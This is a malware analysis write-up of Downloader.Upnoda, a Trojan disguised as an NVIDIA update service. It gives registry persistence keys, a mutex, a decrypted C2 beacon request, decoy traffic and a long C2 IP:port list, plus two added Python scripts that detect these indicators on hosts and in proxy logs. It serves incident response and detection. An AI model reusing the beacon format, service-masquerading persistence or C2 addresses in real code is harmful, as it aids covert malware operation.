Downloader.Upnoda
First posted on 13 November 2014.
Source: Symantec
Aliases:
There are no other names known for Downloader.Upnoda.
Explanation:
When the Trojan is executed, it creates the following file:
C:\Program Files\NVIDIA Corporation\Updates\NvdUpd.exe
The Trojan creates the following registry entries:
HKEY_USERS\.DEFAULT\Software\NVIDIA Corporation\Global\nvUpdSrv\"value" = "14141103"
HKEY_USERS\.DEFAULT\Software\NVIDIA Corporation\Global\nvUpdSrv\"GUID" = "5181c0f2-22fc-4d3e-ab9d-f12df226fc52"
The Trojan modifies the following registry entries so that it runs every time Windows starts:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"Type" = dword:00000010
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"Start" = dword:00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"ObjectName" = "LocalSystem"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"ImagePath" = expand:"C:\Program Files\NVIDIA Corporation\Updates\NvdUpd.exe"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"ErrorControl" = dword:00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"DisplayName" = "NVIDIA Update Server"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvUpdSrv\"Description" = "NVIDIA Settings Update Manager service, used to check new updates from NVIDIA server"
The Trojan creates the following service:
NvUpdSrv
The Trojan may create the following mutexes to mark its presence on the compromised computer:
Global\\MD7H82HHF7EH2D73Nod32_vsegda_na_shag_pozadi
The Trojan may create a file containing the word "OK" if the following command line is specified:
/test [FILE NAME]
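The artifacts above (the NvUpdSrv service key and its values, the dropped NvdUpd.exe, and the mutex) are what a responder checks on a suspect host. The following is an added triage script, not Symantec's code: the indicators are taken from this write-up, while the snapshot layout, the SAMPLE_INFECTED data and the live-collection helpers (which use only winreg and kernel32!OpenMutexW) are the editor's own.

```python
"""Host triage for the Downloader.Upnoda persistence artifacts listed above.

Added example, not Symantec's code. The indicators come from the write-up;
the snapshot layout and SAMPLE_INFECTED are constructed. Live collection
uses only winreg and kernel32!OpenMutexW and is skipped off Windows.
"""
import ctypes
import os
import sys
from typing import Dict, List, Optional

SERVICE_NAME = "NvUpdSrv"
SERVICE_KEY = r"SYSTEM\CurrentControlSet\Services\NvUpdSrv"
DROPPED_FILE = r"C:\Program Files\NVIDIA Corporation\Updates\NvdUpd.exe"
MUTEX_NAME = r"Global\MD7H82HHF7EH2D73Nod32_vsegda_na_shag_pozadi"
SERVICE_START_AUTO = 2            # "Start" = dword:00000002
SERVICE_WIN32_OWN_PROCESS = 0x10  # "Type"  = dword:00000010
ERROR_ACCESS_DENIED = 5


def _norm_path(p: str) -> str:
    # ImagePath is REG_EXPAND_SZ and may be quoted; compare loosely.
    return p.strip().strip('"').lower()


def evaluate(snapshot: Dict) -> List[str]:
    """Return the Upnoda indicators present in a snapshot shaped like
    {"service": {value_name: data} or None, "file_exists": bool, "mutex_present": bool}."""
    findings = []
    svc = snapshot.get("service")
    if svc is not None:
        findings.append(f"service {SERVICE_NAME} is registered")
        if _norm_path(str(svc.get("ImagePath", ""))) == _norm_path(DROPPED_FILE):
            findings.append("ImagePath points at the dropped NvdUpd.exe")
        if svc.get("Start") == SERVICE_START_AUTO:
            findings.append("Start=2: auto-start at boot")
        if str(svc.get("ObjectName", "")).lower() == "localsystem":
            findings.append("ObjectName=LocalSystem")
        if svc.get("Type") == SERVICE_WIN32_OWN_PROCESS:
            findings.append("Type=0x10: own-process Win32 service")
    if snapshot.get("file_exists"):
        findings.append("dropped file present: " + DROPPED_FILE)
    if snapshot.get("mutex_present"):
        findings.append("mutex present: the Trojan is currently running")
    return findings


def read_service_key() -> Optional[Dict]:
    """Read every value under the NvUpdSrv service key; None if the key is absent."""
    import winreg  # Windows only
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SERVICE_KEY)
    except FileNotFoundError:
        return None
    values, i = {}, 0
    with key:
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:  # ERROR_NO_MORE_ITEMS
                break
            values[name] = data
            i += 1
    return values


def mutex_present() -> bool:
    """Probe the mutex without creating it. A failed open with
    ERROR_ACCESS_DENIED still means it exists: the service runs as
    LocalSystem, so a non-admin caller may not be granted SYNCHRONIZE."""
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenMutexW.restype = ctypes.c_void_p
    k32.OpenMutexW.argtypes = (ctypes.c_uint32, ctypes.c_int, ctypes.c_wchar_p)
    h = k32.OpenMutexW(0x00100000, 0, MUTEX_NAME)  # SYNCHRONIZE
    if h:
        k32.CloseHandle(ctypes.c_void_p(h))
        return True
    return ctypes.get_last_error() == ERROR_ACCESS_DENIED


def collect_live() -> Dict:
    if sys.platform != "win32":
        raise RuntimeError("live collection requires Windows")
    return {"service": read_service_key(),
            "file_exists": os.path.exists(DROPPED_FILE),
            "mutex_present": mutex_present()}


# Constructed snapshot mirroring the registry values in the write-up.
SAMPLE_INFECTED = {
    "service": {"Type": 0x10, "Start": 2, "ErrorControl": 0,
                "ObjectName": "LocalSystem", "ImagePath": DROPPED_FILE,
                "DisplayName": "NVIDIA Update Server"},
    "file_exists": True,
    "mutex_present": True,
}

if __name__ == "__main__":
    snap = collect_live() if sys.platform == "win32" else SAMPLE_INFECTED
    for finding in evaluate(snap) or ["no Upnoda indicators found"]:
        print(finding)
```

Run it as an administrator on the suspect host; off Windows it evaluates the constructed snapshot. The mutex probe is the only indicator that distinguishes a live infection from leftover files and keys, and it deliberately treats an access-denied open as "present", since a Global\ mutex owned by a LocalSystem service is normally not openable by an ordinary user.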
The Trojan may contact a remote host (see list below).
The Trojan sends the following request to a remote host:
GET /stat?uid=100&downlink=1111&uplink=1111&id=0007EADB&statpass=bpass&version=14141025&features=30&guid=80c040ab-5524-4a11-8f10-3eda1378bf70&comment=14141025&p=0&s= HTTP/1.0
The Trojan sends a request to its remote host to perform a GET operation against another host, using the following command:
>LMrMGET /robots.txt HTTP/1.1
Host: www.google.com
Accept: */*
Note: The above command is decrypted. The command will normally appear in an encrypted format.
The Trojan receives the following data from the remote host:
The contents of the requested robots.txt file.
Note: By having the Trojan fetch benign content like this, the remote host can return data while making the malicious traffic look like ordinary web browsing.
The Trojan downloads and runs encrypted files.
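The check-in above is the stable network indicator: the parameter names and statpass=bpass are fixed, while the values vary (this write-up itself shows version=14141025 in the beacon but 14141103 in the registry, and two different GUIDs), and the robots.txt fetch from www.google.com is deliberately indistinguishable from normal browsing. The script below is an added example, not Symantec's code: it parses the /stat beacon and flags proxy-log lines that carry it or reach a listed remote host. The log line layout ("time client method url status") and SAMPLE_LOG are constructed by the editor; the C2 endpoints are a subset of the remote host list further down.

```python
"""Spot the Downloader.Upnoda check-in and its C2 endpoints in a web-proxy log.

Added example, not Symantec's code. The beacon parameter set, the static
statpass value and the C2 endpoints come from the write-up; the log line
layout ("time client method url status") and SAMPLE_LOG are constructed.
"""
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

# Names of every query parameter in the documented beacon. Their values vary
# per build and per victim (the write-up shows two versions and two GUIDs),
# so match on the parameter set and the static statpass, not on the values.
BEACON_PARAMS = {"uid", "downlink", "uplink", "id", "statpass", "version",
                 "features", "guid", "comment", "p", "s"}
STATIC_STATPASS = "bpass"

# A few of the IP:port pairs from the remote host list in the write-up.
C2_ENDPOINTS = {"184.106.82.27:40259", "206.220.43.92:41780",
                "104.131.39.69:51982", "23.95.80.46:25127"}


def parse_beacon(url: str) -> Optional[Dict[str, str]]:
    """Return the beacon's fields if `url` is the Upnoda /stat check-in, else None."""
    parts = urlsplit(url)
    if parts.path != "/stat":
        return None
    q = parse_qs(parts.query, keep_blank_values=True)  # the trailing "s=" is empty
    if set(q) != BEACON_PARAMS or q["statpass"] != [STATIC_STATPASS]:
        return None
    return {k: v[0] for k, v in q.items()}


def scan_proxy_log(lines: Iterable[str]) -> List[Dict]:
    """Flag GET lines that carry the beacon or reach a listed C2 endpoint."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4 or fields[2] != "GET":
            continue
        ts, client, _, url = fields[:4]
        dest = urlsplit(url).netloc
        beacon = parse_beacon(url)
        if beacon is None and dest not in C2_ENDPOINTS:
            continue
        hits.append({
            "time": ts, "client": client, "dest": dest,
            "reason": "upnoda beacon" if beacon else "known C2 endpoint",
            "bot_id": beacon["id"] if beacon else None,
            "version": beacon["version"] if beacon else None,
        })
    return hits


# Constructed sample log: the decoy robots.txt fetch, the documented beacon,
# an unrelated /stat URL, a bare connection to a listed host, and a POST.
SAMPLE_LOG = [
    "2014-11-13T10:00:00Z 10.0.0.5 GET http://www.google.com/robots.txt 200",
    "2014-11-13T10:00:07Z 10.0.0.5 GET http://184.106.82.27:40259/stat?uid=100"
    "&downlink=1111&uplink=1111&id=0007EADB&statpass=bpass&version=14141025"
    "&features=30&guid=80c040ab-5524-4a11-8f10-3eda1378bf70&comment=14141025&p=0&s= 200",
    "2014-11-13T10:01:00Z 10.0.0.7 GET http://example.com/stat?uid=5&page=home 200",
    "2014-11-13T10:02:30Z 10.0.0.9 GET http://23.95.80.46:25127/ 503",
    "2014-11-13T10:03:00Z 10.0.0.9 POST http://example.com/upload 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```

The google robots.txt line is not flagged, which is the point of the note above: that request is the bot's cover traffic and looks exactly like a browser's. The beacon's id field (0007EADB here) is worth recording per hit, since it is the bot identifier the operator sees and lets you tie several client IPs to one infection when a host moves between addresses.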
Remote host list (IP:port):
184.106.82.27:40259
213.229.78.145:26084
206.220.43.92:41780
193.111.2.42:64167
195.12.48.190:61307
50.115.127.84:49105
50.17.185.81:32353
193.203.196.144:20480
149.13.20.158:32136
205.186.137.149:23099
37.34.50.225:33918
46.105.169.107:62059
188.252.0.237:33097
69.164.223.222:43118
195.175.227.173:19592
223.165.30.17:36991
5.34.183.119:31973
204.10.38.236:28654
212.58.15.2:54275
217.28.192.36:37228
198.7.58.68:23480
213.192.92.3:53109
212.58.4.190:19413
213.239.227.1:29071
209.17.119.203:34373
107.6.137.234:15396
217.117.155.156:30111
212.53.89.138:31174
146.0.7.65:21903
46.105.8.10:61107
81.27.85.81:21999
209.124.64.106:31571
204.14.213.177:13023
63.251.156.211:24291
5.45.73.50:51515
87.107.133.83:34275
5.77.45.71:58914
104.131.39.69:51982
217.146.84.52:12825
37.203.143.244:48775
210.168.30.246:23962
31.192.211.42:30007
31.192.112.72:35352
37.58.72.235:49719
178.60.205.159:51633
54.241.28.66:21074
31.192.211.203:32872
203.135.192.31:25905
46.45.163.130:60098
46.105.183.122:60541
217.148.186.239:35367
129.82.103.78:36034
188.165.186.239:10315
80.252.188.228:30708
66.155.9.238:26878
77.78.104.96:17653
78.46.54.252:21580
202.217.72.1:19919
194.27.180.16:10238
61.175.227.159:27247
31.172.248.42:36427
189.89.125.65:18703
200.59.162.167:25833
46.165.233.149:35173
207.19.62.122:32406
37.59.34.40:29296
5.39.119.213:42661
80.94.26.250:19285
46.105.127.116:48166
217.12.219.16:49976
174.143.49.35:37485
70.38.101.66:11410
178.151.195.163:44937
108.163.203.138:48741
107.170.145.233:12898
173.45.248.153:18397
194.99.117.15:39361
213.171.195.48:13664
159.253.4.167:13737
46.183.145.233:30577
79.133.192.206:41023
23.253.148.126:58046
144.212.130.17:11263
146.255.96.17:16107
212.227.97.247:22512
46.38.161.165:18625
212.175.86.17:42737
178.79.146.212:49878
178.60.205.211:54663
72.13.32.43:29755
217.148.186.250:16193
204.74.99.100:30124
121.52.223.11:38107
188.132.223.18:22740
212.91.140.51:16549
178.16.25.80:47298
109.104.94.2:11754
209.198.1.10:49891
212.83.144.4:33816
202.32.201.67:30989
216.99.153.26:49649
23.95.80.46:25127
Note: The list was run together in the source. Every unambiguous entry uses a five-digit port, and that form was assumed for the four entries whose split is ambiguous (223.165.30.17:36991 / 5.34.183.119, 63.251.156.211:24291 / 5.45.73.50, 87.107.133.83:34275 / 5.77.45.71 and 37.59.34.40:29296 / 5.39.119.213, which could otherwise be read as a four-digit port followed by a 15.x, 15.x, 55.x or 65.x address).
Last update 13 November 2014